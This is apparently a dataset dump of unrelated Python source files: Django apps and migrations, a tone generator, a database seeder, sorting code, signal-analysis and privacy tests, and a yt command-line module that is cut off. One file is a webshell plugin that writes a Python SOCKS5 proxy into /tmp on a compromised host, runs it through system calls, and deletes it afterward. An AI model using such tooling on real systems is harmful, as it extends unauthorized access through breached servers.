content
stringlengths 5
1.05M
|
|---|
class LabelSettings(object):
@property
def INSTALLED_APPS(self):
return super().INSTALLED_APPS + ['labels']
default = LabelSettings
|
import math
import numpy
import pyaudio
"""Note table
Key: Note Value: # of half steps
"""
NOTES_TABLE = {'Bb': 1, 'B': 2,
'C': 3, 'C#': 4,
'D': 5, 'Eb': 6,
'E': 7, 'F': 8,
'F#': 9, 'G': 10,
'Ab': 11}
BASE_FREQ = 440
def get_note(note, base_freq=BASE_FREQ):
"""
Formula:
frequency = 440 * 2^(n/12)
:param note: Which note to return
:param base_freq: 440 is A
:return:
"""
octave = 1
if '-' in note:
i = note.split('-')
note = i[0]
if i[1][0].lower() == 'u':
octave = int(i[1][1])
if i[1][0].lower() == 'd':
octave = int(i[1][1]) * -1
if note is 'A':
freq = 440 * octave
else:
freq = (base_freq * math.pow(2, NOTES_TABLE[note] / 12)) * octave
return [freq, note]
def sine(frequency, length, rate):
length = int(length * rate)
factor = float(frequency) * (math.pi * 2) / rate
return numpy.sin(numpy.arange(length) * factor)
def play_tone(stream, frequency=BASE_FREQ, length=1, rate=44100):
chunks = []
chunks.append(sine(frequency, length, rate))
chunk = numpy.concatenate(chunks) * 0.25
stream.write(chunk.astype(numpy.float32).tostring())
if __name__ == '__main__':
p = pyaudio.PyAudio()
RATE = 44100
stream = p.open(format=pyaudio.paFloat32,
channels=1, rate=RATE, output=1)
note_list = (input('Enter some notes: ')).split(' ')
for note in note_list:
data = get_note(note)
print('Note: ' + data[1] + " Frequency: " + str(data[0]))
play_tone(stream, frequency=data[0])
stream.close()
p.terminate()
|
# coding: utf-8
import math
import os
import random
import string
import sys
import time
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(PROJECT_DIR)
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite.settings')
import django
django.setup()
from django.conf import settings
from django.db.utils import IntegrityError
from django.contrib.auth.models import User
from boards.models import Board
from comments.models import Comment
from subjects.models import Subject
print("\n\tEnter credentials for creating SUPERUSER.") if not settings.DEBUG \
else print("\n\tUsing default credentials for SUPERUSER."); time.sleep(1);
SUPERUSER_USERNAME = input("\n\tUsername: ") if not settings.DEBUG else "admin"
SUPERUSER_EMAIL = input("\n\tEmail: ") if not settings.DEBUG else "admin@example.com"
SUPERUSER_PASSWORD = input("\n\tPassword: ") if not settings.DEBUG else "top_secret"
TOTAL_BOARDS = 10 # How many boards to create?
TOTAL_SUBSCRIBES = 50 # How many subscribes to distribute randomly?
BOARDS_TITLE_LENGTH = 10
TOTAL_USERS = 10 # How many users to create?
USERS_PASSWORD = "top_secret" # What password to set for each user?
TOTAL_SUBJECTS = 20 # How many subjects to create?
TOTAL_STARS = 100 # How many stars to distribute randomly?
SUBJECTS_TITLE_LENGTH = 30
TOTAL_COMMENTS = 20 # How many comments to distribute randomly?
COMMENTS_BODY_LENGTH = 50
CHARS = string.ascii_lowercase + string.ascii_uppercase
def calculate_percentage(num, total):
"""Calculate percentage."""
return math.trunc(((num + 1) / total) * 100)
def clear_screen():
"""Clear command prompt screen."""
if os.name == "posix":
os.system('clear')
elif os.name in ("nt", "dos", "ce"):
os.system('CLS')
def show_progress_bar(percentage, func_name):
"""Show progress bar & percentage & function name."""
clear_screen()
progress_bar = "#" * int(percentage / 2)
print(f"\n\t[{progress_bar}] {percentage}%")
print(f"\n\t({func_name}) running.")
def task_done_message(total_entries=None, func_name=None):
"""Print report for single function."""
if total_entries and func_name:
print(f"\n\tAdded {total_entries} entries. ({func_name}) done.")
elif total_entries:
print(f"\n\tAdded {total_entries} entries.")
elif func_name:
print(f"\n\t({func_name}) done.")
time.sleep(1)
def generate_dummy_text(length):
"""Generate dummy text for boards, subjects & comments."""
chars_list = [random.choice(CHARS) for i in range(length)]
for i in range(len(chars_list)):
if i%5 == 0:
chars_list.insert(i, " ")
text = "".join(chars_list)
return text
def final_report():
"""Show final report for the database entries created."""
clear_screen()
print(f"""
**Final Report**
[+] {TOTAL_BOARDS} boards created.
[+] {TOTAL_USERS} users created.
[+] {TOTAL_SUBJECTS} subjects created.
[+] {TOTAL_STARS} stars distributed.
[+] {TOTAL_SUBSCRIBES} subscribes distributed.
[+] {TOTAL_COMMENTS} comments distributed.
Database populated successfully.
Login as admin using following credentials.
username: {SUPERUSER_USERNAME}
password: {SUPERUSER_PASSWORD}
""")
def create_superuser():
"""Create superuser."""
try:
user = User.objects.create_superuser(
username=SUPERUSER_USERNAME,
email=SUPERUSER_EMAIL,
password=SUPERUSER_PASSWORD
)
user.save()
task_done_message(func_name=create_superuser.__name__)
except IntegrityError as e:
print(e)
def create_boards():
"""Create boards & make SUPERUSER the admin of all boards."""
admin = User.objects.get(username=SUPERUSER_USERNAME)
total_entries = TOTAL_BOARDS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_boards.__name__)
title = generate_dummy_text(BOARDS_TITLE_LENGTH)
description = title * random.randint(1, 10)
board = Board.objects.create(
title=title,
description=description
)
board.save()
board.admins.add(admin)
board.subscribers.add(admin)
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_boards.__name__)
def create_users():
"""Create users."""
total_entries = TOTAL_USERS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_users.__name__)
username = "".join(random.choice(CHARS) for i in range(10))
email = username + "@example.com"
user = User.objects.create_user(
username=username,
email=email,
password=USERS_PASSWORD
)
user.save()
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_users.__name__)
def create_subjects():
"""Create subjects with different author & board."""
total_entries = TOTAL_SUBJECTS
for number in range(total_entries):
try:
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, create_subjects.__name__)
title = generate_dummy_text(SUBJECTS_TITLE_LENGTH)
body = title * random.randint(1, 10)
author = User.objects.get(id=random.randint(1, TOTAL_USERS))
board = Board.objects.get(id=random.randint(1, TOTAL_BOARDS))
subject = Subject.objects.create(
title=title,
body=body,
author=author,
board=board
)
subject.save()
subject.points.add(author)
except IntegrityError as e:
print(e)
task_done_message(total_entries, create_subjects.__name__)
def distribute_stars():
"""Distribute stars on different subjects."""
total_entries = TOTAL_STARS
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_stars.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
subject = Subject.objects.get(id=random.randint(1, TOTAL_SUBJECTS))
if user in subject.points.all():
continue
else:
subject.points.add(user)
task_done_message(total_entries, distribute_stars.__name__)
def distribute_comments():
"""Distribute comments on different subjects with different users."""
total_entries = TOTAL_COMMENTS
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_comments.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
subject = Subject.objects.get(id=random.randint(1, TOTAL_SUBJECTS))
body = generate_dummy_text(COMMENTS_BODY_LENGTH)
comment = Comment.objects.create(
body=body,
subject=subject,
commenter=user
)
comment.save()
task_done_message(total_entries, distribute_comments.__name__)
def distribute_subscribes():
"""Distribute subscribes on different boards with different users."""
total_entries = TOTAL_SUBSCRIBES
for number in range(total_entries):
percentage = calculate_percentage(number, total_entries)
show_progress_bar(percentage, distribute_subscribes.__name__)
user = User.objects.get(id=random.randint(1, TOTAL_USERS))
board = Board.objects.get(id=random.randint(1, TOTAL_BOARDS))
if user in board.subscribers.all():
continue
else:
board.subscribers.add(user)
task_done_message(total_entries, distribute_subscribes.__name__)
def main():
# DO NOT change the order of these functions.
clear_screen()
create_superuser()
create_boards()
create_users()
create_subjects()
distribute_stars()
distribute_subscribes()
distribute_comments()
final_report()
if __name__ == '__main__':
main()
|
from .dispatch.rules import bot
from .framework.bot import ABCBotLabeler, Bot, BotBlueprint, BotLabeler, bot_run_multibot
from .tools.dev_tools.mini_types.bot import MessageMin
Message = MessageMin
Blueprint = BotBlueprint
rules = bot
|
from django.apps import AppConfig
class CodeanalysisConfig(AppConfig):
name = 'codeAnalysis'
|
"""
Insertion Sort
Always keep sorted in the sublist of lower positions. Each new item is then `inserted` back into
the previous sublist.
The insertion step looks like bubble sort, if the item located at `i` is smaller than the one before,
then exchange, until to a proper position.
[5, 1, 3, 2] --- 1st pass ---> [1, 5, 3, 2] --- 2nd pass ---> [1, 3, 5, 2]
↑---↓ ↑---↓
"""
def insertion_sort(alist: list) -> list:
for idx in range(1, len(alist)):
# during each pass, insert the item at `idx` back into the previous sublist
sub_idx = idx - 1
while sub_idx >= 0:
if alist[sub_idx] > alist[idx]:
alist[sub_idx], alist[idx] = alist[idx], alist[sub_idx]
idx = sub_idx
sub_idx -= 1
return alist
if __name__ == '__main__':
a = [5, 1, 3, 2]
print(insertion_sort(a))
|
import os
import secrets
from flask import render_template, url_for, redirect, request, Response
from palette.forms import ImageForm
from palette import app
from kmeans import get_colors
def save_picture(form_picture):
random_hex = secrets.token_hex(8)
_, f_ext = os.path.splitext(form_picture.filename)
picture_name = random_hex + f_ext
picture_path = os.path.join(app.root_path, 'static/img', picture_name)
form_picture.save(picture_path)
return picture_name
@app.route('/', methods=['GET', 'POST'])
def home():
form = ImageForm()
if form.validate_on_submit():
f_name = save_picture(form.picture.data)
color_list = get_colors(
form.picture.data, int(request.form['colorCount']))
palette_path = '-'.join(color_list)
return redirect(url_for('palette', colors=palette_path, image=f_name))
return render_template('home.html', form=form)
@app.route('/palette/<colors>')
def palette(colors):
hex_colors = ['#' + color for color in colors.split('-')]
image = request.args.get('image')
return render_template('palette.html', colors=hex_colors, image=image, download_url=request.path)
@app.route('/download/css/palette/<colors>')
def download_css(colors):
color_list = colors.split('-')
output = ":root {\n"
for i, val in enumerate(color_list):
output += " --color-{0}: #{1};\n".format(i + 1, val)
output += '}'
return Response(output, mimetype="text/css", headers={"Content-Disposition": 'attachment; filename="colors.css"'})
@app.route('/download/scss/palette/<colors>')
def download_scss(colors):
color_list = colors.split('-')
output = ""
for i, val in enumerate(color_list):
output += "$color-{0}: #{1};\n".format(i + 1, val)
return Response(output, mimetype="text/x-scss", headers={"Content-Disposition": 'attachment; filename="colors.scss"'})
@app.route('/download/json/palette/<colors>')
def download_json(colors):
color_list = colors.split('-')
output = "{\n"
for i, val in enumerate(color_list):
output += ' "color-{0}": "#{1}",\n'.format(i + 1, val)
output += "}"
return Response(output, mimetype="text/json", headers={"Content-Disposition": 'attachment; filename="colors.json"'})
|
from django.template import Library, Node
register = Library()
class DumpNode(Node):
def render(self, context):
# for v in context.dicts[7]: print vars(context.get(v))
# import ipdb; ipdb.set_trace()
return ''
@register.tag
def dump_context(parser, token):
return DumpNode()
dump_context.is_safe = True
|
import dataclasses
import typing
import module3
@dataclasses.dataclass()
class Bar:
def is_in_foo(self, foo: module3.Foo):
return self in foo.bars
|
#!/usr/bin/env python3
from time import time
def find_pythagorean_triplet(n):
""" Find a Pythagorean triplet a^2+b^2=c^2 for which a+b+c=`n`. """
for c in range(n - 2, 0, -1):
for a in range(n - c - 1, 0, -1):
b = n - c - a
# Check if a,b,c form a valid Pythagorean triplet.
if a**2 + b**2 == c**2:
return a, b, c
if __name__ == '__main__':
start = time()
a, b, c = find_pythagorean_triplet(1000)
elapse = time() - start
print('Pythagorean triplet found: {} + {} + {} = 1000'.format(a, b, c))
print('\nSolution: {}'.format(a * b * c))
print('Solution found in {:.8f}s'.format(elapse))
|
# Generated by Django 3.0.1 on 2020-07-02 20:15
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Recall',
fields=[
('Recall_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Recall_CODE', models.CharField(max_length=500, verbose_name='Rückruf-Code')),
('Recall_NAME', models.CharField(max_length=500, verbose_name='Name')),
('Recall_DESCRIPTION', models.CharField(max_length=500, verbose_name='Beschreibung')),
('Recall_START_DATE', models.DateField(blank=True, verbose_name='Startdatum')),
('Recall_PLANNED_COMPLETATION_DATE', models.DateField(blank=True, verbose_name='Geplantes Fertigstellungsdatum')),
('Recall_STATUS', models.SmallIntegerField(choices=[(0, 'Erstellt'), (1, 'In Planung'), (2, 'In Bearbeitung'), (3, 'Abgeschlossen'), (4, 'Abgebrochen')], default=0, verbose_name='Status')),
('Recall_DATE_COMPLETED', models.DateField(blank=True, verbose_name='Tatsächliches Fertigstellungsdatum')),
],
),
migrations.CreateModel(
name='Vehicle',
fields=[
('Vehicle_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Vehicle_VIN', models.CharField(max_length=30, verbose_name='FIN')),
('Vehicle_PLATE', models.CharField(max_length=10, verbose_name='Kennzeichen')),
('Vehicel_MAKE', models.CharField(max_length=30, verbose_name='Hersteller')),
('Vehicle_MODEL', models.CharField(max_length=30, verbose_name='Modell')),
('Vehicle_TYPE', models.CharField(max_length=60, verbose_name='Typ')),
('Vehicle_SERIES', models.CharField(max_length=30, verbose_name='Baureihe')),
('Vehicle_FIRST_REGISTRATION_DATE', models.DateField(verbose_name='Erstzulassungsdatum')),
],
),
migrations.CreateModel(
name='Workshop',
fields=[
('Workshop_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Workshop_EXTERNAL_ID', models.CharField(max_length=10, verbose_name='externe ID')),
('Workshop_NAME', models.CharField(max_length=50, verbose_name='Name')),
('Workshop_ADDRESS', models.CharField(max_length=70, verbose_name='Adresse')),
('Workshop_ZIP', models.CharField(max_length=10, verbose_name='PLZ')),
('Workshop_CITY', models.CharField(max_length=50, verbose_name='Stadt')),
('Workshop_Email', models.EmailField(blank=True, max_length=254, verbose_name='Email')),
('Workshop_PHONE', models.CharField(blank=True, max_length=30, verbose_name='Telefon')),
],
),
migrations.CreateModel(
name='Vehicel_Recall',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('VR_STATUS', models.SmallIntegerField(choices=[(0, 'Offen'), (1, 'Vorbelegt'), (0, 'Abgeschlossen')], default=0, verbose_name='Status')),
('VR_DATE_CREATED', models.DateField(auto_now=True, verbose_name='Anlagedatum')),
('VR_DATE_COMPLETED', models.DateField(blank=True, verbose_name='Fertigstellungsdatum')),
('Recall', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Recall')),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
],
),
migrations.CreateModel(
name='Recall_Docs',
fields=[
('Document_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Document_CLASS', models.SmallIntegerField(choices=[(0, 'Anleitung'), (1, 'Technische Information'), (2, 'Anschreiben'), (3, 'Sonstiges')], default=3, verbose_name='Dokumententyp')),
('Document_PATH', models.FilePathField(path='C:\\Users\\felix\\Desktop\\Projects\\my_env\\dfa\\dfa_App\\media\\uploads\\documents\\', verbose_name='Upload Pfad')),
('Recall', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Recall')),
],
),
migrations.CreateModel(
name='Note',
fields=[
('Note_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('Note_TEXT', models.CharField(max_length=500, verbose_name='Bemerkung')),
('Note_DATE', models.DateTimeField(auto_now=True, verbose_name='Zeitpunkt')),
('Note_ODOMETER', models.IntegerField(verbose_name='Kilometerstand')),
('User', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
],
),
migrations.CreateModel(
name='History',
fields=[
('History_ID', models.AutoField(primary_key=True, serialize=False, verbose_name='ID')),
('History_EXTERNAL_ID', models.CharField(max_length=500, verbose_name='Externe ID')),
('History_DESCRIPTION', models.CharField(max_length=500, verbose_name='Beschreibung')),
('History_ODOMETER', models.IntegerField(verbose_name='Kilometerstand')),
('History_DATE', models.DateField(verbose_name='Datum')),
('Vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Vehicle')),
('Workshop', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Workshop')),
],
),
migrations.AddField(
model_name='user',
name='Workshop',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='dfa_App.Workshop'),
),
migrations.AddField(
model_name='user',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups'),
),
migrations.AddField(
model_name='user',
name='user_permissions',
field=models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions'),
),
]
|
# coding: utf-8
import unittest
from unittest import mock
import numpy as np
from spectrum import marple_data
from hrv.classical import (time_domain, frequency_domain, _auc, _poincare,
_nn50, _pnn50, _calc_pburg_psd)
from hrv.io import read_from_text
from hrv.rri import RRi
from tests.test_utils import FAKE_RRI
class TimeDomainIndexesTestCase(unittest.TestCase):
def test_correct_response(self):
response = time_domain(FAKE_RRI)
expected = {'rmssd': 38.07,
'sdnn': 29.82,
'nn50': 1,
'pnn50': 25,
'mrri': 793.75,
'mhr': 75.67}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
self.assertEqual(response.keys(),
expected.keys())
def test_correct_response_with_rri_in_seconds(self):
response = time_domain(np.array(FAKE_RRI) / 1000)
expected = {'rmssd': 38.07,
'sdnn': 29.82,
'nn50': 1,
'pnn50': 25,
'mrri': 793.75,
'mhr': 75.67}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
def test_nn50(self):
nn50 = _nn50(FAKE_RRI)
expected = 1
self.assertEqual(nn50, expected)
def test_pnn50(self):
pnn50 = _pnn50(FAKE_RRI)
expected = 25
self.assertEqual(pnn50, expected)
class FrequencyDomainTestCase(unittest.TestCase):
def setUp(self):
self.real_rri = read_from_text('tests/test_files/real_rri.txt')
def test_frequency_domain_with_welch_method(self):
time = np.cumsum(self.real_rri) / 1000.0
time -= time[0]
response = frequency_domain(self.real_rri, time=time, sf=4,
method='welch', nperseg=256, noverlap=128,
window='hanning')
expected = {'total_power': 3602.89,
'vlf': 844.5,
'lf': 1343.50,
'hf': 1414.88,
'lf_hf': 0.94,
'lfnu': 48.70,
'hfnu': 51.29}
np.testing.assert_almost_equal(sorted(response.values()),
sorted(expected.values()),
decimal=2)
self.assertEqual(response.keys(),
expected.keys())
def test_area_under_the_curve(self):
fxx = np.arange(0, 1, 1 / 1000.0)
pxx = np.ones(len(fxx))
results = _auc(fxx, pxx, vlf_band=(0, 0.04), lf_band=(0.04, 0.15),
hf_band=(0.15, 0.4))
np.testing.assert_almost_equal(results['vlf'], 0.04, decimal=2)
np.testing.assert_almost_equal(results['lf'], 0.11, decimal=2)
np.testing.assert_almost_equal(results['hf'], 0.25, decimal=2)
np.testing.assert_almost_equal(results['total_power'], 0.4, decimal=2)
np.testing.assert_almost_equal(results['lf_hf'], 0.44, decimal=1)
np.testing.assert_almost_equal(results['lfnu'], 30.5, decimal=0)
np.testing.assert_almost_equal(results['hfnu'], 69.5, decimal=0)
@mock.patch('hrv.classical.pburg')
def test_pburg_method_being_called(self, _pburg):
_calc_pburg_psd(rri=[1, 2, 3], sf=4.0)
_pburg.assert_called_once_with(data=[1, 2, 3], NFFT=None, sampling=4.0,
order=16)
@mock.patch('hrv.classical._auc')
@mock.patch('hrv.classical._interpolate_rri')
@mock.patch('hrv.classical._calc_pburg_psd')
def test_frequency_domain_function_using_pburg(self, _pburg_psd, _irr,
_auc):
fake_rri = [1, 2, 3, 4]
_irr.return_value = fake_rri
_pburg_psd.return_value = (np.array([1, 2]), np.array([3, 4]))
frequency_domain(fake_rri, sf=4, method='ar', interp_method='cubic',
order=16)
_pburg_psd.assert_called_once_with(rri=fake_rri, sf=4, order=16)
def test_calc_pburg_psd_returns_numpy_arrays(self):
fake_rri = list(range(20))
fxx, pxx = _calc_pburg_psd(fake_rri, sf=4.0)
self.assertIsInstance(fxx, np.ndarray)
self.assertIsInstance(pxx, np.ndarray)
def test_scale_by_freq_set_to_false(self):
"""
To certify that scale_by_freq is set to False this test will check
the average value of the estimated psd of the marple_data.
It must be approximately equal to 0.40.
"""
fxx, pxx = _calc_pburg_psd(marple_data, sf=1.0)
np.testing.assert_almost_equal(np.mean(pxx), 0.400, decimal=2)
@mock.patch('hrv.classical._interpolate_rri')
def test_using_rri_class(self, _interp):
"""
Test if no time is passed as argument the frequency domain function
uses time array from RRi class
"""
_interp.return_value = [800, 810, 790, 815]
rri = RRi([800, 810, 790, 815])
frequency_domain(rri)
_interp.assert_called_once_with(rri, rri.time, 4.0, 'cubic')
class NonLinearTestCase(unittest.TestCase):
def test_correct_response_from_poincare(self):
fake_rri = [10, 11, 25, 27]
expected_sd1 = 5.11
expected_sd2 = 11.64
sd1, sd2 = _poincare(fake_rri)
np.testing.assert_almost_equal(sd1, expected_sd1, decimal=1)
np.testing.assert_almost_equal(sd2, expected_sd2, decimal=1)
|
from libs.config import alias, color
from libs.myapp import send, delay_send, is_windows, has_env, get_system_code, base64_encode
from libs.functions.webshell_plugins.old_socks import *
from threading import Thread
from time import sleep
def get_python(port):
return get_php_old_socks() % port
@alias(True, _type="OTHER")
def run(port: int = 8888):
"""
old_socks
will be deprecated soon, please use command socks instead.
(Only for *unix) Run a socks5 server on the target system by python.
eg: socks {port=8888}
"""
if (is_windows()):
print(color.red("Target system isn't *unix"))
return
flag = has_env("python")
if flag:
python = get_python(port)
pyname = "check.py"
res = send(f"print(file_put_contents('/tmp/{pyname}', base64_decode(\"{base64_encode(python)}\")));")
if (not res):
return
text = res.r_text.strip()
if not len(text):
print(color.red("Failed to write file in /tmp directory."))
return
t = Thread(target=send, args=(get_system_code(f"python /tmp/{pyname}"),))
t.setDaemon(True)
t.start()
t2 = Thread(
target=delay_send, args=(10.0, f"unlink('/tmp/{pyname}');",)
)
t2.setDaemon(True)
t2.start()
sleep(1)
if (t.is_alive()):
print(f"\nStart socks5 server listen on {port} {color.green('success')}.\n")
else:
print(f"\nStart socks5 server {color.red('error')}.\n")
else:
print(
color.red(
"The target host does not exist or cannot be found in the python environment."
)
)
|
from TurtleBop.models.guild import *
|
import random
import numpy as np
import pandas as pd
import pytest
from privacy_budget import PrivacyBudget
from privacy_budget_tracker import MomentPrivacyBudgetTracker
from private_machine_learning import private_SGD
from utils import check_absolute_error
@pytest.fixture
def data():
np.random.seed(1)
x = np.random.rand(1000)*100
data = [(i, 5*i+8) for i in x]
return data
def test_private_SGD(data):
train_data, test_data = data[:800], data[800:]
param = np.random.rand(2) # y = param[0]*x+param[1]
def gradient_function(batch_data):
x, y = batch_data
y_pred = param[0]*x + param[1]
d0 = -2.0 * x * (y-y_pred)
d1 = -2.0 * (y-y_pred)
return [d0, d1]
def get_weights_function():
return np.copy(param)
def learning_rate_function(step):
if step < 10:
return 0.1
elif step < 50:
return 0.01
else:
return 0.005
def update_weights_function(new_weight):
param[:] = new_weight
def test_function():
n = len(test_data)
x = np.array([i[0] for i in test_data])
y = np.array([i[1] for i in test_data])
y_pred = param[0]*x + param[1]
loss = 1.0/n*np.sum((y_pred-y)**2)
check_absolute_error(loss, 0., 20.)
moment_accountant = MomentPrivacyBudgetTracker(PrivacyBudget(10, 0.001))
private_SGD(gradient_function=gradient_function,
get_weights_function=get_weights_function,
update_weights_function=update_weights_function,
learning_rate_function=learning_rate_function,
train_data=train_data,
group_size=100,
gradient_norm_bound=10,
number_of_steps=100,
sigma=1,
moment_privacy_budget_tracker=moment_accountant,
test_interval=100,
test_function=test_function
)
check_absolute_error(moment_accountant.consumed_privacy_budget.epsilon, 8.805554, 1e-6)
check_absolute_error(moment_accountant.consumed_privacy_budget.delta, 0.000625, 1e-6)
|
# coding: utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import tensorflow as tf
class Recorder(object):
"""To save training processes, inspired by Nematus"""
def load_from_json(self, file_name):
tf.logging.info("Loading recoder file from {}".format(file_name))
record = json.load(open(file_name, 'rb'))
record = dict((key.encode("UTF-8"), value) for (key, value) in record.items())
self.__dict__.update(record)
def save_to_json(self, file_name):
tf.logging.info("Saving recorder file into {}".format(file_name))
json.dump(self.__dict__, open(file_name, 'wb'), indent=2)
|
from django.db import models
from django.contrib.auth.models import User
class File(models.Model):
title = models.CharField(max_length=255, blank=True)
hash_val = models.CharField(max_length=200)
uploaded_at = models.DateTimeField(auto_now_add=True)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return f"Title: {self.title} hash_val :{self.hash_val} uploaded_at {self.uploaded_at}"
class Meta:
ordering = ['-uploaded_at']
class FileGroup(models.Model):
title = models.CharField(max_length=255, unique=True)
files = models.ManyToManyField(File)
user = models.ForeignKey(User, on_delete=models.CASCADE)
def __str__(self):
return f"{self.title} containing following files:\n{self.files.all()}"
class Team(models.Model):
name = models.CharField(max_length=64, unique=True)
password = models.CharField(max_length=64)
description = models.CharField(max_length=1024, blank=True)
created_at = models.DateTimeField(auto_now_add=True)
members = models.ManyToManyField(User, through='Member')
def __str__(self):
return f"{self.name} created on {self.created_at}\nMember(s): {self.members.all()}"
class Member(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
team = models.ForeignKey(Team, on_delete=models.CASCADE, blank=True)
def __str__(self):
return f"User: {self.user} belongs to {self.team}"
|
"""
A means of running standalone commands with a shared set of options.
"""
from __future__ import print_function
from __future__ import absolute_import
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.config import ytcfg
ytcfg["yt","__command_line"] = "True"
from yt.startup_tasks import parser, subparsers
from yt.mods import *
from yt.funcs import *
from yt.extern.six import add_metaclass
from yt.extern.six.moves import urllib
from yt.utilities.minimal_representation import MinimalProjectDescription
import argparse, os, os.path, math, sys, time, subprocess, getpass, tempfile
import base64, os
def _fix_ds(arg):
if os.path.isdir("%s" % arg) and \
os.path.exists("%s/%s" % (arg,arg)):
ds = load("%s/%s" % (arg,arg))
elif os.path.isdir("%s.dir" % arg) and \
os.path.exists("%s.dir/%s" % (arg,arg)):
ds = load("%s.dir/%s" % (arg,arg))
elif arg.endswith(".index"):
ds = load(arg[:-10])
else:
ds = load(arg)
return ds
def _add_arg(sc, arg):
if isinstance(arg, str):
arg = _common_options[arg].copy()
argc = dict(arg.items())
argnames = []
if "short" in argc: argnames.append(argc.pop('short'))
if "longname" in argc: argnames.append(argc.pop('longname'))
sc.add_argument(*argnames, **argc)
class YTCommandSubtype(type):
def __init__(cls, name, b, d):
type.__init__(cls, name, b, d)
if cls.name is not None:
names = ensure_list(cls.name)
for name in names:
sc = subparsers.add_parser(name,
description = cls.description,
help = cls.description)
sc.set_defaults(func=cls.run)
for arg in cls.args:
_add_arg(sc, arg)
@add_metaclass(YTCommandSubtype)
class YTCommand(object):
args = ()
name = None
description = ""
aliases = ()
ndatasets = 1
@classmethod
def run(cls, args):
self = cls()
# Some commands need to be run repeatedly on datasets
# In fact, this is the rule and the opposite is the exception
# BUT, we only want to parse the arguments once.
if cls.ndatasets > 1:
self(args)
else:
ds_args = getattr(args, "ds", [])
if len(ds_args) > 1:
datasets = args.ds
for ds in datasets:
args.ds = ds
self(args)
elif len(ds_args) == 0:
datasets = []
self(args)
else:
args.ds = getattr(args, 'ds', [None])[0]
self(args)
class GetParameterFiles(argparse.Action):
def __call__(self, parser, namespace, values, option_string = None):
if len(values) == 1:
datasets = values
elif len(values) == 2 and namespace.basename is not None:
datasets = ["%s%04i" % (namespace.basename, r)
for r in range(int(values[0]), int(values[1]), namespace.skip) ]
else:
datasets = values
namespace.ds = [_fix_ds(ds) for ds in datasets]
_common_options = dict(
all = dict(longname="--all", dest="reinstall",
default=False, action="store_true",
help="Reinstall the full yt stack in the current location."),
ds = dict(short="ds", action=GetParameterFiles,
nargs="+", help="datasets to run on"),
ods = dict(action=GetParameterFiles, dest="ds",
nargs="*", help="(Optional) datasets to run on"),
axis = dict(short="-a", longname="--axis",
action="store", type=int,
dest="axis", default=4,
help="Axis (4 for all three)"),
log = dict(short="-l", longname="--log",
action="store_true",
dest="takelog", default=True,
help="Use logarithmic scale for image"),
